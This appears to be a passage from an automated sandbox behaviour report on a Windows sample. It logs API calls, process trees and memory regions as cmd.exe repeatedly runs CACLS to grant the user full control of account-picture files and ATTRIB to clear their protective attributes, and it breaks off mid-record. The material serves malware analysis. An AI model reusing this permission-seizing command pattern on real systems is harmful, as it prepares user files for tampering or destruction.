[0187.317] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x2aef30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aef30) returned 0xffffffff [0187.317] GetLastError () returned 0x2 [0187.318] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x2aef30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aef30) returned 0x4ae4d8 [0187.318] FindClose (in: hFindFile=0x4ae4d8 | out: hFindFile=0x4ae4d8) returned 1 [0187.318] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0187.318] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0187.318] GetConsoleTitleW (in: lpConsoleTitle=0x2af428, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0187.318] InitializeProcThreadAttributeList (in: lpAttributeList=0x2af2b0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2af378 | out: lpAttributeList=0x2af2b0, lpSize=0x2af378) returned 1 [0187.318] UpdateProcThreadAttribute (in: lpAttributeList=0x2af2b0, dwFlags=0x0, Attribute=0x60001, lpValue=0x2af370, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2af2b0, lpPreviousValue=0x0) returned 1 [0187.318] GetStartupInfoW (in: lpStartupInfo=0x2af26c | out: lpStartupInfo=0x2af26c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0187.318] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0187.318] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2af30c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2af358 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp\"", lpProcessInformation=0x2af358*(hProcess=0x4c, hThread=0x50, dwProcessId=0x8e4, dwThreadId=0xe8c)) returned 1 [0187.320] CloseHandle (hObject=0x50) returned 1 [0187.320] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0187.320] GetEnvironmentStringsW () returned 0x4b2410* [0187.320] FreeEnvironmentStringsW (penv=0x4b2410) returned 1 [0187.320] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0187.355] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x2af24c | out: lpExitCode=0x2af24c*=0x0) returned 1 [0187.355] CloseHandle (hObject=0x4c) returned 1 [0187.355] _vsnwprintf (in: _Buffer=0x2af394, _BufferCount=0x13, _Format="%08X", _ArgList=0x2af258 | out: _Buffer="00000000") returned 8 [0187.355] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0187.356] GetEnvironmentStringsW () returned 0x4b2410* [0187.356] FreeEnvironmentStringsW (penv=0x4b2410) returned 1 [0187.356] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0187.356] GetEnvironmentStringsW () returned 0x4b2410* [0187.356] FreeEnvironmentStringsW (penv=0x4b2410) returned 1 [0187.356] DeleteProcThreadAttributeList (in: lpAttributeList=0x2af2b0 | out: lpAttributeList=0x2af2b0) [0187.356] _get_osfhandle (_FileHandle=1) returned 0x7 [0187.356] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0187.356] _get_osfhandle (_FileHandle=1) returned 0x7 [0187.356] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0187.356] _get_osfhandle (_FileHandle=0) returned 0x3 [0187.356] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0187.356] SetConsoleInputExeNameW () returned 0x1 [0187.356] GetConsoleOutputCP () returned 0x1b5 [0187.356] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0187.356] SetThreadUILanguage (LangId=0x0) returned 0x409 [0187.357] exit (_Code=0) Process: id = "392" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea16c40" os_pid = "0xe90" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "391" os_parent_pid = "0xefc" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 27005 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 27006 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 27007 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 27008 start_va = 0xd0000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 27009 start_va = 0x650000 end_va = 0x658fff entry_point = 0x650000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 27010 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 27011 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 27012 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 27013 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 27014 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 27015 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 27016 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 27017 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 27018 start_va = 0x160000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 27019 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 27020 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 27021 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 27022 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 27023 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 27024 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 27025 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 27026 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 559 os_tid = 0xd58 Thread: id = 560 os_tid = 0xfa0 Process: id = "393" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16c40" os_pid = "0x8e4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "391" os_parent_pid = "0xefc" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 27027 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 27028 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 27029 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 27030 start_va = 0xb0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 27031 start_va = 0x280000 end_va = 0x286fff entry_point = 0x280000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 27032 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 27033 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 27034 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 27035 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 27036 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 27037 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 27038 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 27039 start_va = 0xf0000 end_va = 0x156fff entry_point = 0xf0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 27040 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 27041 start_va = 0x480000 end_va = 0x57ffff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 27042 start_va = 0x6dea0000 end_va = 0x6debcfff entry_point = 0x6dea0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 27043 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 27044 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 27045 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 27046 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 27047 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 27048 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 27049 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 27050 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 27051 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 27052 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 27053 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 27054 start_va = 0x160000 end_va = 0x227fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 27055 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 27056 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 561 os_tid = 0xe8c Process: id = "394" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16d80" os_pid = "0x924" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 27057 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 27058 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 27059 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 27060 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 27061 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 27062 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 27063 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 27064 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 27065 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 27066 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 27067 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 27068 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 27069 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 27070 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 27071 start_va = 0x250000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 27072 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 27073 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 27074 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 27075 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 27076 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 27077 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 27078 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 27079 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 27080 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 27081 start_va = 0x350000 end_va = 0x417fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 27082 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 27083 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 27084 start_va = 0x1c0000 end_va = 0x1c6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 27085 start_va = 0x1e0000 end_va = 0x1e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 27086 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 27087 start_va = 0x200000 end_va = 0x200fff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 27088 start_va = 0x420000 end_va = 0x520fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 27089 start_va = 0x530000 end_va = 0x112ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 27090 start_va = 0x1130000 end_va = 0x1292fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001130000" filename = "" Region: id = 27091 start_va = 0x12a0000 end_va = 0x156efff entry_point = 0x12a0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 562 os_tid = 0x670 [0187.410] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12fe3c | out: lpSystemTimeAsFileTime=0x12fe3c*(dwLowDateTime=0xa49ad440, dwHighDateTime=0x1d440a9)) [0187.410] GetCurrentProcessId () returned 0x924 [0187.410] GetCurrentThreadId () returned 0x670 [0187.410] GetTickCount () returned 0x357fe [0187.410] QueryPerformanceCounter (in: lpPerformanceCount=0x12fe34 | out: lpPerformanceCount=0x12fe34*=24419948333) returned 1 [0187.411] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0187.411] __set_app_type (_Type=0x1) [0187.411] __p__fmode () returned 0x76b331f4 [0187.411] __p__commode () returned 0x76b331fc [0187.411] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0187.411] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0187.411] GetCurrentThreadId () returned 0x670 [0187.411] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x670) returned 0x38 [0187.411] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0187.411] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0187.411] SetThreadUILanguage (LangId=0x0) returned 0x409 [0187.412] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0187.412] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12fdcc | out: phkResult=0x12fdcc*=0x0) returned 0x2 [0187.412] VirtualQuery (in: lpAddress=0x12fe03, lpBuffer=0x12fd9c, dwLength=0x1c | out: lpBuffer=0x12fd9c*(BaseAddress=0x12f000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0187.412] VirtualQuery (in: lpAddress=0x30000, lpBuffer=0x12fd9c, dwLength=0x1c | out: lpBuffer=0x12fd9c*(BaseAddress=0x30000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0187.412] VirtualQuery (in: lpAddress=0x31000, lpBuffer=0x12fd9c, dwLength=0x1c | out: lpBuffer=0x12fd9c*(BaseAddress=0x31000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0187.412] VirtualQuery (in: lpAddress=0x33000, lpBuffer=0x12fd9c, dwLength=0x1c | out: lpBuffer=0x12fd9c*(BaseAddress=0x33000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0187.412] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x12fd9c, dwLength=0x1c | out: lpBuffer=0x12fd9c*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0187.412] GetConsoleOutputCP () returned 0x1b5 [0187.412] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0187.412] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0187.412] _get_osfhandle (_FileHandle=1) returned 0x7 [0187.412] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0187.412] _get_osfhandle (_FileHandle=1) returned 0x7 [0187.412] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0187.412] _get_osfhandle (_FileHandle=1) returned 0x7 [0187.412] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0187.413] _get_osfhandle (_FileHandle=0) returned 0x3 [0187.413] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0187.413] _get_osfhandle (_FileHandle=0) returned 0x3 [0187.413] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0187.413] GetEnvironmentStringsW () returned 0x260308* [0187.413] FreeEnvironmentStringsW (penv=0x260308) returned 1 [0187.413] GetEnvironmentStringsW () returned 0x260308* [0187.413] FreeEnvironmentStringsW (penv=0x260308) returned 1 [0187.413] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12ed3c | out: phkResult=0x12ed3c*=0x40) returned 0x0 [0187.413] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12ed44, lpData=0x12ed48, lpcbData=0x12ed40*=0x1000 | out: lpType=0x12ed44*=0x0, lpData=0x12ed48*=0xb8, 